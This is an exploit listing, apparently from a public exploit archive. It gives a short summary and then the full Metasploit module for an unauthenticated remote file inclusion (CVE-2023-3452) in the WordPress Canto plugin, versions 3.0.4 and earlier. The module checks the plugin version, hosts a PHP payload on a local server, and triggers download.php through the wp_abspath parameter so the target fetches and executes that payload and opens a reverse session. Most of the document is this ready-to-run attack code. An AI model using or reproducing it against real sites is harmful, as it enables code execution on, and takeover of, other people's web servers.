## https://sploitus.com/exploit?id=PACKETSTORM:217131
=============================================================================================================================================
| # Title : WordPress Canto Plugin โค 3.0.4 Unauthenticated Remote File Inclusion Leading to RCE |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://wordpress.com/plugins/canto |
=============================================================================================================================================
[+] Summary : This Metasploit module targets a Remote File Inclusion (RFI) vulnerability in the WordPress Canto Plugin versions 3.0.4 and earlier.
The issue resides in the download.php file, where the wp_abspath parameter is not properly validated before being used in a file inclusion context.
An unauthenticated attacker can supply a remote URL, causing the application to include and execute arbitrary PHP code.
The module works by:
Verifying the installed plugin version via readme.txt.
Starting a local HTTP server to host a malicious PHP payload.
Triggering the vulnerable download.php endpoint with a crafted wp_abspath parameter pointing to the attacker-controlled payload.
Establishing a reverse session once the remote server includes and executes the payload.
Successful exploitation results in remote code execution with the privileges of the web server process
[+] POC :
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::HttpServer
def initialize(info = {})
super(update_info(info,
'Name' => 'WordPress Canto Plugin <= 3.0.4 - Unauthenticated RFI to RCE',
'Description' => %q{
This module exploits a Remote File Inclusion (RFI) vulnerability in the
WordPress Canto plugin (<= 3.0.4). The issue exists in download.php
via the 'wp_abspath' parameter.
},
'Author' => [ 'indoushka' ],
'License' => MSF_LICENSE,
'References' => [ [ 'CVE', '2023-3452' ] ],
'Payload' => { 'BadChars' => "\x00" },
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Targets' => [ ['Canto <= 3.0.4', {}] ],
'DisclosureDate' => '2023-06-12',
'DefaultTarget' => 0,
'Notes' => {
'Stability' => [ CRASH_SAFE ],
'SideEffects' => [ IOC_IN_LOGS ],
'Reliability' => [ REPEATABLE_SESSION ]
}))
register_options([
OptString.new('TARGETURI', [true, 'The base path to WordPress', '/'])
])
end
def check
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'wp-content/plugins/canto/readme.txt')
})
return Exploit::CheckCode::Unknown("Target is unreachable.") unless res
if res.code == 200 && res.body.include?('Canto')
version = res.body.match(/Stable tag:\s*([\d\.]+)/)
if version
v_str = version[1]
if Rex::Version.new(v_str) <= Rex::Version.new('3.0.4')
return Exploit::CheckCode::Vulnerable("Canto version #{v_str} detected.")
end
return Exploit::CheckCode::Safe("Canto version #{v_str} is not vulnerable.")
end
end
Exploit::CheckCode::Safe
end
def on_request_uri(cli, _request)
print_good("Target reached out! Sending PHP payload...")
send_response(cli, payload.encoded, { 'Content-Type' => 'application/x-httpd-php' })
end
def exploit
start_service
payload_url = get_uri
target_path = normalize_uri(target_uri.path, 'wp-content/plugins/canto/includes/lib/download.php')
print_status("Triggering RFI at #{target_path}")
print_status("Hosting payload at #{payload_url}")
res = send_request_cgi({
'method' => 'GET',
'uri' => target_path,
'vars_get' => {
'wp_abspath' => payload_url
}
}, 5)
if res
print_status("Server responded with status: #{res.code}")
else
print_status("No response from server (this is common for RFI), checking for session...")
end
handler
end
end
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================